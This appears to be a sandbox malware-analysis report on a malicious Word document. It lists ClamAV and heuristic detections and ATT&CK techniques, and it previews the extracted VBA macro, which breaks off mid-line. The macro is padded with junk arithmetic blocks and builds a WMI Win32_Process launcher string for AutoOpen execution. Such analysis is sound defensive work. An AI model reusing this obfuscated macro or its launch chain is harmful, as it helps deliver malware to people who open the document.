Verdict: MALICIOUS
Risk Score: 282

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1218.011 System Binary Proxy Execution: Rundll32
The sample is a malicious Office document containing a VBA macro. The macro uses a GetObject call to obtain the Win32_Process WMI object, a common technique for executing arbitrary commands. This strongly suggests the macro's purpose is to download and execute a second-stage payload. The presence of an 'AutoOpen' marker further indicates an attempt at automatic execution when the document is opened.
Heuristics (8)
- ClamAV: Doc.Trojan.Agent-6865779-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Agent-6865779-0
- VBA macros detected (medium, OLE_VBA_MACROS, 4 related findings): Document contains VBA macro code
- VBA WMI Win32_Process launcher (critical, OLE_VBA_WMI_PROCESS_CREATE): VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 67496 bytes |

SHA-256: feb2e8da134ee9772f4e702930e68cb22a69c4991da7b61a03a2ab9419b9a875

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "w77_53"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "O_50_774"
Function T66601()
Select Case u95___
Case 597006865
E_210_ = Log(i37381)
a_61770 = CDate(151534258)
i_7442 = Fix(573579794 + 752050419 + A013641_ - Oct(887969649))
f_05_4_ = Cos(768775770 - Sqr(611325877 - Atn(261974595)) - 971638103 + 111750113)
End Select
Select Case C97_82
Case 278688654
H213_7 = Log(w5929_)
f98_6_5 = CDate(684312635)
z4_9_31 = Fix(252831619 + 754090176 + V___809 - Oct(908347358))
o94_8__ = Cos(613966850 - Sqr(287766295 - Atn(747657348)) - 328224497 + 320591154)
End Select
Select Case Y90760_5
Case 580070389
R89__3 = Log(E7__24)
t__3641_ = CDate(22054463)
b9_33__ = Fix(602565754 + 756292340 + v_60_40 - Oct(856926338))
i_17__ = Cos(729590920 - Sqr(87467166 - Atn(489760208)) - 752933649 + 912667544)
End Select
Select Case K_52_27_
Case 177333787
k3__2_3 = Log(w_41_10)
w5_36_0_ = CDate(655480252)
h_499__ = Fix(759729688 + 916753652 + r64_595 - Oct(234308573))
H24798_ = Cos(158800170 - Sqr(91612982 - Atn(383639002)) - 316115768 + 668786398)
End Select
Select Case Z6__6_5
Case 285496016
L_0_0_ = Log(M776_77_)
Z__556 = CDate(419865413)
o__13__ = Fix(999562846 + 661461244 + B545_9_ - Oct(85031302))
S87__47 = Cos(869290511 - Sqr(585131624 - Atn(305539742)) - 528683759 + 503737552)
End Select
Select Case Z098444_
Case 361829639
X98010 = Log(L_7_9_1)
k0425__0 = CDate(552518153)
c4_4__57 = Fix(717034400 + 162176873 + Y17_1_19 - Oct(164101860))
H0032__ = Cos(948896218 - Sqr(458622766 - Atn(335761700)) - 247279783 + 65008454)
End Select
Select Case z99314
Case 129959308
F__59__ = Log(M_3834)
z_9900_5 = CDate(137557560)
v__6196 = Fix(552123428 + 873937833 + j_8838_ - Oct(419434354))
Z3442_ = Cos(429344521 - Sqr(201169827 - Atn(979967955)) - 13894415 + 436137061)
End Select
Select Case C37_180
Case 108455735
P3__5_ = Log(R_028__)
s1__85 = CDate(250678368)
W092__ = Fix(361438588 + 901971494 + L4905_0 - Oct(526280935))
i8_37_1_ = Cos(324762076 - Sqr(733685562 - Atn(821460567)) - 605602818 + 118877269)
End Select
End Function
Function i_70_275(r4572__, k4___9_)
On Error Resume Next
Select Case l28_64
Case 959725067
K840349 = Log(R6_59903)
N_40_6 = CDate(418386698)
K2_68096 = Fix(113907901 + 854125529 + k44__267 - Oct(905263432))
r_67__ = Cos(407073994 - Sqr(248341252 - Atn(772540463)) - 8154078 + 840156377)
End Select
Select Case S_0_9494
Case 578409755
m58462 = Log(Z3_155_)
a59__47 = CDate(154944219)
w52__4 = Fix(734345708 + 781951147 + M_63988 - Oct(353845467))
Z_91_4_ = Cos(385865863 - Sqr(767592528 - Atn(64585333)) - 119409880 + 97014600)
End Select
d131888 = z601495 + "winmgmts:Win32" + "_ProcessStartup" + c91__5
Select Case R22_65
Case 792918848
j_9_3_ = Log(c43__29)
V6_857 = CDate(938201937)
j58_3860 = Fix(68478561 + 303797768 + O0471236 - Oct(591699553))
k5_6805 = Cos(518396187 - Sqr(686036972 - Atn(157877705)) - 425619283 + 158885138)
End Select
Select Case Y9248695
Case 133364163
A647989 = Log(X6_5093)
z_5_214 = CDate(387436246)
q579_21_ = Fix(670992951 + 311723520 + K9_610 - Oct(814344261))
N__33414 = Cos(16961
... (truncated)